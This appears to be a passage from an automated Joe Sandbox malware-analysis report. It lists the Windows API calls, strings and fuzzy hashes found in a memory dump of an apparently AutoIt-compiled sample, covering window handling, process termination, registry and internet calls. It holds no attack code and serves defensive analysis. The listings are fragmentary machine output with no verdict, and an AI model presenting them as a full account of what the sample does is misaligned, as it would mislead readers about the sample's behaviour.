                                                                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007A565C
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3311875123-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 0077B1C1
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0077B225
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0077B242
                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0077B253
                                                                                                                                        • EndPaint.USER32(?,?), ref: 0077B29D
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1827037458-0
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(00821810,00000000,?,?,00821810,00821810,?,007DE2D6), ref: 007CE21B
                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 007CE23F
                                                                                                                                        • ShowWindow.USER32(00821810,00000000,?,?,00821810,00821810,?,007DE2D6), ref: 007CE29F
                                                                                                                                        • ShowWindow.USER32(?,00000004,?,?,00821810,00821810,?,007DE2D6), ref: 007CE2B1
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 007CE2D5
                                                                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007CE2F8
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                          • Part of subcall function 00763BCF: _wcscpy.LIBCMT ref: 00763BF2
                                                                                                                                        • _wcstok.LIBCMT ref: 007B1D6E
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B1DFD
                                                                                                                                        • _memset.LIBCMT ref: 007B1E30
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                        • String ID: X
                                                                                                                                        • API String ID: 774024439-3081909835
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0077B5EB
                                                                                                                                          • Part of subcall function 0077B58B: SelectObject.GDI32(?,00000000), ref: 0077B5FA
                                                                                                                                          • Part of subcall function 0077B58B: BeginPath.GDI32(?), ref: 0077B611
                                                                                                                                          • Part of subcall function 0077B58B: SelectObject.GDI32(?,00000000), ref: 0077B63B
                                                                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007CE9F2
                                                                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 007CEA06
                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007CEA14
                                                                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 007CEA24
                                                                                                                                        • EndPath.GDI32(00000000), ref: 007CEA34
                                                                                                                                        • StrokePath.GDI32(00000000), ref: 007CEA44
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 43455801-0
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0079EFB6
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0079EFC7
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0079EFCE
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0079EFD6
                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0079EFED
                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0079EFFF
                                                                                                                                          • Part of subcall function 0079A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0079A79D,00000000,00000000,?,0079AB73), ref: 0079B2CA
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 603618608-0
                                                                                                                                        APIs
                                                                                                                                        • __init_pointers.LIBCMT ref: 007887D7
                                                                                                                                          • Part of subcall function 00781E5A: __initp_misc_winsig.LIBCMT ref: 00781E7E
                                                                                                                                          • Part of subcall function 00781E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00788BE1
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00788BF5
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00788C08
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00788C1B
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00788C2E
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00788C41
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00788C54
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00788C67
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00788C7A
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00788C8D
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00788CA0
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00788CB3
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00788CC6
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00788CD9
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00788CEC
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00788CFF
                                                                                                                                        • __mtinitlocks.LIBCMT ref: 007887DC
                                                                                                                                          • Part of subcall function 00788AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0081AC68,00000FA0,?,?,007887E1,00786AFA,008167D8,00000014), ref: 00788AD1
                                                                                                                                        • __mtterm.LIBCMT ref: 007887E5
                                                                                                                                          • Part of subcall function 0078884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 007889CF
                                                                                                                                          • Part of subcall function 0078884D: _free.LIBCMT ref: 007889D6
                                                                                                                                          • Part of subcall function 0078884D: RtlDeleteCriticalSection.NTDLL(0081AC68), ref: 007889F8
                                                                                                                                        • __calloc_crt.LIBCMT ref: 0078880A
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00788833
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2942034483-0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1423608774-0
                                                                                                                                        APIs
                                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00761898
                                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 007618A0
                                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007618AB
                                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007618B6
                                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 007618BE
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007618C6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4278518827-0
                                                                                                                                        APIs
                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007A8504
                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007A851A
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 007A8529
                                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A8538
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A8542
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A8549
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 839392675-0
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 007AA330
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 007AA341
                                                                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,007D66D3,?,?,?,?,?,0076E681), ref: 007AA34E
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,007D66D3,?,?,?,?,?,0076E681), ref: 007AA35B
                                                                                                                                          • Part of subcall function 007A9CCE: CloseHandle.KERNEL32(?,?,007AA368,?,?,?,007D66D3,?,?,?,?,?,0076E681), ref: 007A9CD8
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 007AA36E
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 007AA375
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                        APIs
                                                                                                                                        • _memmove.LIBCMT ref: 0076C419
                                                                                                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,007A6653,?,?,00000000), ref: 0076C495
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead_memmove
                                                                                                                                        • String ID: Sfz
                                                                                                                                        • API String ID: 1325644223-315366904
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0078010A: std::exception::exception.LIBCMT ref: 0078013E
                                                                                                                                          • Part of subcall function 0078010A: __CxxThrowException@8.LIBCMT ref: 00780153
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                          • Part of subcall function 0076BBD9: _memmove.LIBCMT ref: 0076BC33
                                                                                                                                        • __swprintf.LIBCMT ref: 0077D98F
                                                                                                                                        Strings
                                                                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0077D832
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                        • API String ID: 1943609520-557222456
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 007BB4A8
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 007BB5B7
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007BB73A
                                                                                                                                          • Part of subcall function 007AA6F6: VariantInit.OLEAUT32(00000000), ref: 007AA736
                                                                                                                                          • Part of subcall function 007AA6F6: VariantCopy.OLEAUT32(?,?), ref: 007AA73F
                                                                                                                                          • Part of subcall function 007AA6F6: VariantClear.OLEAUT32(?), ref: 007AA74B
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                        • API String ID: 4237274167-1221869570
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00763BCF: _wcscpy.LIBCMT ref: 00763BF2
                                                                                                                                        • _memset.LIBCMT ref: 007A5E56
                                                                                                                                        • GetMenuItemInfoW.USER32(?), ref: 007A5E85
                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007A5F31
                                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007A5F5B
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 4152858687-4108050209
                                                                                                                                        APIs
                                                                                                                                        • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 007A10B8
                                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007A10EE
                                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007A10FF
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007A1181
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007A5A93
                                                                                                                                        • GetMenuItemInfoW.USER32 ref: 007A5AAF
                                                                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 007A5AF5
                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008218F0,00000000), ref: 007A5B3E
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 1173514356-4108050209
                                                                                                                                        APIs
                                                                                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 007C0478
                                                                                                                                          • Part of subcall function 00767F40: _memmove.LIBCMT ref: 00767F8F
                                                                                                                                          • Part of subcall function 0076A2FB: _memmove.LIBCMT ref: 0076A33D
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$BuffCharLower
                                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                                        • API String ID: 2411302734-567219261
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0079C684
                                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0079C697
                                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 0079C6C7
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 458670788-1403004172
                                                                                                                                        APIs
                                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007B4A60
                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B4A86
                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007B4AB6
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 007B4AFD
                                                                                                                                          • Part of subcall function 007B56A9: GetLastError.KERNEL32(?,?,007B4A2B,00000000,00000000,00000001), ref: 007B56BE
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1951874230-3916222277
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007D454E
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • _memset.LIBCMT ref: 00763965
                                                                                                                                        • _wcscpy.LIBCMT ref: 007639B5
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007639C6
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                        • String ID: Line:
                                                                                                                                        • API String ID: 3942752672-1585850449
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077C657
                                                                                                                                          • Part of subcall function 0077C619: GetStockObject.GDI32(00000011), ref: 0077C66B
                                                                                                                                          • Part of subcall function 0077C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077C675
                                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007C8F69
                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 007C8F70
                                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007C8F85
                                                                                                                                        • DestroyWindow.USER32(?), ref: 007C8F8D
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                        • String ID: SysAnimate32
                                                                                                                                        • API String ID: 4146253029-1011021900
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 007AE392
                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 007AE3E6
                                                                                                                                        • __swprintf.LIBCMT ref: 007AE3FF
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,007FDBF0), ref: 007AE43D
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                        • String ID: %lu
                                                                                                                                        • API String ID: 3164766367-685833217
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                          • Part of subcall function 0079D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0079D640
                                                                                                                                          • Part of subcall function 0079D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0079D653
                                                                                                                                          • Part of subcall function 0079D623: GetCurrentThreadId.KERNEL32 ref: 0079D65A
                                                                                                                                          • Part of subcall function 0079D623: AttachThreadInput.USER32(00000000), ref: 0079D661
                                                                                                                                        • GetFocus.USER32 ref: 0079D7FB
                                                                                                                                          • Part of subcall function 0079D66C: GetParent.USER32(?), ref: 0079D67A
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0079D844
                                                                                                                                        • EnumChildWindows.USER32(?,0079D8BA), ref: 0079D86C
                                                                                                                                        • __swprintf.LIBCMT ref: 0079D886
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                        • String ID: %s%d
                                                                                                                                        • API String ID: 1941087503-1110647743
                                                                                                                                        • Opcode ID: bb2f53ca827911a1db6b1f2e12b7d87eabcc3443ea3248fd4f3bf8ca30df90b2
                                                                                                                                        • Instruction ID: b7681680dbcb04bf3d5872921991632dacd39970f036bc4685bb99dfdba96f67
                                                                                                                                        • Opcode Fuzzy Hash: bb2f53ca827911a1db6b1f2e12b7d87eabcc3443ea3248fd4f3bf8ca30df90b2
                                                                                                                                        • Instruction Fuzzy Hash: 9C11A271500205BBDF21BFA0AC89FEA3779AB44754F0080B9BE09AA146DB7D5D458B70
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007C18E4
                                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007C1917
                                                                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007C1A3A
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007C1AB0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2364364464-0
                                                                                                                                        • Opcode ID: dbdf74bae3da172bdc402112adfa4c1586b18b9c9f9cff96b75d8e252030206c
                                                                                                                                        • Instruction ID: 17c2af58ac44120f54ded965d5e3cadd82114fc09dc13a299f0afb41a3bff2a4
                                                                                                                                        • Opcode Fuzzy Hash: dbdf74bae3da172bdc402112adfa4c1586b18b9c9f9cff96b75d8e252030206c
                                                                                                                                        • Instruction Fuzzy Hash: 51818370A40205EBDF10AF64C889BAD7BE5EF45720F54C059F919AF382D7B8E9418B90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 007C05DF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007C066E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 007C068C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007C06D2
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 007C06EC
                                                                                                                                          • Part of subcall function 0077F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007AAEA5,?,?,00000000,00000008), ref: 0077F282
                                                                                                                                          • Part of subcall function 0077F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007AAEA5,?,?,00000000,00000008), ref: 0077F2A6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 327935632-0
                                                                                                                                        • Opcode ID: 807f3cdf5c4d91aa0569f67663eecc3a4a29770e3523f4c0c98081cca241882b
                                                                                                                                        • Instruction ID: f53c3551711036f99aa0f49f6df41a4098e1506e70ad265ff2d660727f3b7252
                                                                                                                                        • Opcode Fuzzy Hash: 807f3cdf5c4d91aa0569f67663eecc3a4a29770e3523f4c0c98081cca241882b
                                                                                                                                        • Instruction Fuzzy Hash: 59514B75A00205EFCB00EFA8C894EADB7B5BF48310F158059E956AB351DB38ED45CF91
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                          • Part of subcall function 007C3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2AA6,?,?), ref: 007C3B0E
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C2DE0
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C2E1F
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007C2E66
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 007C2E92
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C2E9F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3440857362-0
                                                                                                                                        • Opcode ID: 946452e4e1db092eed337da7eb0ec738af15b37a7a71cf9ebca0773070db7bc9
                                                                                                                                        • Instruction ID: a3082ad6059a7df52f40a63b073c0f8a398ded25291cf483db72367615524552
                                                                                                                                        • Opcode Fuzzy Hash: 946452e4e1db092eed337da7eb0ec738af15b37a7a71cf9ebca0773070db7bc9
                                                                                                                                        • Instruction Fuzzy Hash: 01516C71204205EFC714EF64C885F6AB7E8BF88304F04891DF9969B2A2DB39ED05DB52
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fbceade026a981a90505247f8634f1a745ba53545bee427ed7abceb528f6a51d
                                                                                                                                        • Instruction ID: 2a5bd4a3294456e29ddeaec91b26f9a2213af8e1fded756622bec5c0c4d12105
                                                                                                                                        • Opcode Fuzzy Hash: fbceade026a981a90505247f8634f1a745ba53545bee427ed7abceb528f6a51d
